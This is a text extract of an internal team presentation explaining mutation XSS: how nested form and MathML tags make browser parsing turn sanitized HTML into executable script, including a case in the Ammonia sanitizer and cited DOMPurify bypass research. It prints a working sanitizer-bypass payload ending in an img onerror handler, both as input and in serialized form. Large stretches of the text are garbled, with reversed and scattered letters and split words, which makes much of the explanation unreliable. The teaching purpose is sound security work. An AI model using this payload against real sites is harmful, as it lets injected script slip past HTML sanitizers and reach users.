A presentation at Internal Team Session by Adithya Raj
Mutation XSS By Adithya Raj
Contents 1 INTRODUCTION 3 NAMESPACES 5 MUTATION USING NESTED FORM TAGS 2 WHAT IS A SANITIZATION 4 MUTATION IN AMMONIA 6 THE FIX!!! LIBRARY?
Introduction Everyone knows what XSS is and how much impact this holds. What if the user input is reflected on to the DOM but it is filtered. That’s where mutation XSS comes into play. Mutation XSS happens when a safe html is parsed into an unsafe html because of bugs in browser parsing.
Let’s check something shall we. What will be the output of the html code? Will an alert pop up? <form><math><mtext></form><form><mglyph> <style></math><img src onerror=alert(1)> No, It won’t pop up an alert
Now how about the serialized html code of the previously parsed Dom->
<form><math><mtext><form><mglyph> <style></math><img src onerror=alert(1)> </style></mglyph></form></mtext></math> </form> Wow, this pops up an alert!!!Yes, the Second html code pops up an alert box but WHY?? Before we ponder into that que stion let’s look at some things that you sh ould know.
y r a r b i L n o i t a z i t i n a S ? s k r o w y f i r u p m o D e k i ) l l y m r t a H r t b i u l p n n i o ( i t e z a i z t i i t i n n a s a . S y f a i r s u e p o M d O w D = Ho l m t h r e n n div.i s p e e t e s r t e s M e O h D t a s e o o t e g n i r e r e d p t d e u n s k M u r r O a a t e D I p h m t s s i l i h s l m t e t m s s h t r e H o a z i t t p t u n i i r n k e a inp c s s a w y b o f e i r d h r b t e u z p i e l o h M t a i t O r , d l D e e s n m d t s e n i h h e r e T p e e p r n t a n i M s i e O h D h t c i e o h h t w t n e e e r Then t m t n g i M s O s a D e a h t o t r n i k Afte c a b p u k r a m l . e e htm r t M O D t n e m u doc
y r a r b i L n o i t a z i t i n a S : r e d r o s i h t w o l l o f g s n i n s o i r t a a p r e p ➡️ o g n i z i The l t a i i r t e u s p t u ➡️ o g e n i h t s t a par h t n . o i e t p m a m s u e s s h t a e e b h l t l i n w o g k r n i o s r w a s p e i r r e a s r b w i l o r n b o i e t h a t z . i r e t i e n t m i f a t a s y r e e e e s v r e e t h T e M u O r t D e e b h t t o d n n t a h s g e i v i m g s i h t . S s r S X e s n o w i o t r a b t u in M s o g t u s b d o a t e l e u s D Thi
MathML INtegration Points HTML Integrati on Points <annotat ion-xml> <foreignO bject> <desc> <title> <mglyph> Namespa ces <mtext> <mi> <mo> <mn> <ms> <malignmar k>
Mutation In Ammonia
Mutation using From Tags <form><math><mtext></form><form> <mglyph><style></math><img src onerror=alert(1)> Payload Parsed
Mutation using From Tags <form><math><mtext><form><mglyph><style> </math><img src onerror=alert(1)></style></mglyph> </form></mtext></math></form> Serialized parsed
Nested <form> <form id=”first”>inside form1 <form id=“second”> inside form2 Mis-nested <form>
<form id=”first” >inside form1 <div></form> <form id=”second”> inside form2Now if the mis-nested forms are parsed and serialized again then it will give. <form id=”first”>inside form1<div><form id=”second”>inside form2</form></div> </form> If it is parsed again it will give the following dom tree
n i a g a e c n o d a o l y a p e h t t a k o o l s ’ t e l Now t> x e t m < > h t a m < > > m r m r o <fo f < > m r o f > / < e l y t <s > h p y l c r <mg s g m <i > h t a > ) 1 ( </m t r e l a = r o r oner d a o l y Pa
e l y t s < > h p y l g <m > > m e r l y o t f < s / < > xt> ) e 1 ( t t r m e < l > > a h = t m r r a o o r m f r < e </ > h t a <form> ><img src on /m < > t x e h t m / < > </mat m or f / < > h p </mgly e l y t s < > h p y l g <m > t x e t > t m x < > e t h t a /m < m > < h > p m y )> l 1 ( g t r m <for / e l < a > = e l r y o t r s r / e < n o c r s mg i < > h t </ma d e s r a P d e z i l a i Ser d e s r a P XSS
The Fix
Referen ces https:// researc h.secur com/mu itum. tation-x ss-viamathm l-mutat dompur ionify-2-0 -17-bypa ss/ https:// researc h.securi um.com t /helping -secure dompur ify-part -1/ t s a e B g n i t a t A Mu https:/ /resea rch.sec um.com u rit /dompu rifybypass -usingmxss/ https://cure53.de/fp170. pdf